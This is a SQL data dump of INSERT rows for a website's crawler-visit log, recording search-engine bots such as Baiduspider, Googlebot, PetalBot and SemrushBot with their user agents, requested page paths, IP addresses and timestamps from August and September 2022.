INSERT INTO `ey_weapp_spider_visit` VALUES ('95483', '2', 'mozilla/5.0 (compatible; baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)', '/', '110.82.126.54', '1660846837', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95479', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/shs.html', '114.119.151.155', '1660842707', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95279', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/products/306.html', '185.191.171.1', '1660722195', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95291', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/132.html', '114.119.151.153', '1660729198', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95294', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/honor/', '114.119.151.155', '1660732518', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95307', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/26.html', '220.181.108.112', '1660740713', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95310', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/140.html', '185.191.171.26', '1660744283', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95337', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/243.html', '114.119.151.155', '1660758210', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95339', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bcxw/list_19_3/', '185.191.171.22', '1660758620', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95319', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/bljxw/list_18_6/', '114.119.151.153', '1660749860', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95322', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/30.html', '220.181.108.80', '1660751603', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95327', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/102.html', '114.119.151.155', '1660753059', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95329', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/209.html', '185.191.171.25', '1660753757', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95336', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/403.html', '114.119.151.153', '1660758065', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95340', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/153.html', '207.46.13.52', '1660759070', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95343', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/changzhoushi.html', '114.119.151.153', '1660762004', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95347', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/case/238.html', '185.191.171.5', '1660763969', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95357', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/72.html', '116.179.32.223', '1660770998', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95358', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/case/59.html', '216.244.66.194', '1660771166', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95422', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/196.html', '114.119.151.155', '1660805273', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95428', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '207.46.13.9', '1660809362', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95441', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/77.html', '116.179.32.229', '1660822927', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95581', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/138.html', '185.191.171.37', '1660905975', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95585', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/185.html', '207.46.13.52', '1660907067', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95590', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/186.html', '116.179.32.239', '1660911404', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95596', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/', '185.191.171.43', '1660919583', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95650', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/list_2_5/', '116.179.32.88', '1660942387', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95655', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/438.html', '185.191.171.43', '1660943999', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95658', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/105.html', '185.191.171.5', '1660944929', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95659', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/440.html', '185.191.171.16', '1660945490', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98019', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/280.html', '185.191.171.33', '1662004705', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98059', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_29/', '185.191.171.5', '1662023708', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98247', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '116.179.32.42', '1662107852', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98245', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/71.html', '66.249.79.108', '1662107025', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98141', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_12/', '185.191.171.16', '1662057825', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98168', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/', '114.119.151.155', '1662071999', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98150', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_18/', '185.191.171.8', '1662065313', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98160', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/19.html', '114.119.151.153', '1662069998', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98155', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/jsq.html', '114.119.151.155', '1662067459', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98157', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/450.html', '66.249.79.108', '1662069136', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98187', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/products/77.html', '185.191.171.15', '1662076354', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98238', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/88.html', '66.249.79.112', '1662097408', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98236', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tuobeng/', '66.249.79.108', '1662096642', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98248', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/225.html', '66.249.79.110', '1662108357', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98253', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/hld.html', '114.119.151.153', '1662110474', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98254', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_14/', '114.119.151.153', '1662110718', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98257', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/bljxw/list_18_43/', '114.119.151.155', '1662111171', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98259', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/lw.html', '114.119.151.153', '1662111384', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98261', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/346.html', '66.249.79.110', '1662111638', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98264', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/231.html', '185.191.171.37', '1662112330', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98275', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/203.html', '66.249.79.108', '1662116697', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98277', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/list_3_18/', '216.244.66.194', '1662120536', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98282', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/116_2.html', '185.191.171.45', '1662123618', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98292', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/about/', '66.249.79.112', '1662130910', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98288', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/chukouquanqiu/', '66.249.79.110', '1662129369', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98286', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_15/', '185.191.171.23', '1662126808', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98290', '4', 'mozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/50.0.2661.102 safari/537.36; 360spider', '/', '42.236.10.73', '1662129759', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98297', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/news/258.html', '17.121.113.48', '1662134181', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98304', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/gjxw/', '66.249.79.110', '1662137085', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98305', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/92.html', '116.179.32.34', '1662137221', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98312', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/bijie.html', '114.119.151.153', '1662139521', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98317', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/case/53.html', '66.249.79.110', '1662141013', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98330', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/176.html', '185.191.171.25', '1662146005', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98331', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/jbJxw/', '185.191.171.36', '1662146761', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98340', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1662150973', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98348', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/444.html', '185.191.171.33', '1662157473', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98358', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/fxq.html', '114.119.151.155', '1662162977', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98363', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/', '114.119.151.155', '1662165348', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98373', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/141.html', '114.119.151.155', '1662171211', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98397', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/77_2.html', '185.191.171.8', '1662184879', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98398', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1662185121', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98399', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/1_35.html', '66.249.79.110', '1662185248', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98400', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/131.html', '116.179.32.37', '1662186312', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98401', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/jiaruwomen/', '66.249.79.112', '1662186364', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98412', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bljxw/list_18_47/', '162.55.86.60', '1662194418', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98408', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/', '162.55.86.60', '1662194292', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98424', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/60.html', '162.55.86.60', '1662194839', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98436', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/137.html', '162.55.86.60', '1662195213', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98432', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/125.html', '162.55.86.60', '1662195089', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98433', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/126.html', '162.55.86.60', '1662195120', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98535', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/', '114.119.151.153', '1662210911', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98546', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/274.html', '114.119.151.155', '1662212717', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98538', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_36/', '114.119.151.155', '1662211134', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98544', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case', '114.119.151.153', '1662212444', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98552', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/buliaojial', '116.179.32.151', '1662213428', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98558', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/105.html', '116.179.32.163', '1662217636', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98569', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/69.html', '66.249.79.110', '1662221969', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98594', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/baicheng.html', '114.119.151.155', '1662243094', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98599', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/451.html', '157.55.39.153', '1662244457', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98601', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/472.html', '66.249.79.108', '1662245478', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98644', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/124.html', '114.119.151.153', '1662265815', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98658', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/1_17.html', '185.191.171.15', '1662271776', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98815', '99', 'labjs.pro/bot', '/', '176.102.4.7', '1662360110', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98660', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/441.html', '220.181.108.113', '1662272770', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98661', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/bengcheal/', '114.119.151.153', '1662273958', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98812', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/339.html', '116.179.32.38', '1662357783', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98663', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/480.html', '66.249.79.110', '1662275067', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98681', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_32.html', '185.191.171.12', '1662293939', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98720', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/cs.html', '114.119.151.153', '1662312152', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98687', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/330.html', '220.181.108.92', '1662297361', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98703', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/281.html', '116.179.32.149', '1662304811', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98713', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/498.html', '66.249.79.112', '1662311373', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98708', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/305.html', '66.249.79.108', '1662306415', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98709', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/149.html', '220.181.108.103', '1662306577', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98716', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/313.html', '114.119.151.155', '1662311689', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98718', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/xinyu.html', '114.119.151.155', '1662311909', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98724', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/1.html?tagid=1', '116.179.32.25', '1662312431', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98726', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/about', '114.119.151.155', '1662312838', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98728', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/baishan.html', '114.119.151.153', '1662313159', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98735', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/81.html', '185.191.171.15', '1662315194', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98732', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/131.html', '116.179.32.40', '1662313707', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98734', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/118.html', '185.191.171.36', '1662314336', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98736', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/16_5.html', '185.191.171.25', '1662315374', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98759', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/list_3_17/', '216.244.66.194', '1662329880', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98760', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/15.html', '116.179.32.154', '1662329905', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98749', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/298.html', '216.244.66.194', '1662322430', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98747', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/qqhe.html', '114.119.151.155', '1662319374', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98753', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1662324470', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98755', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/374.html', '185.191.171.14', '1662324633', '0');
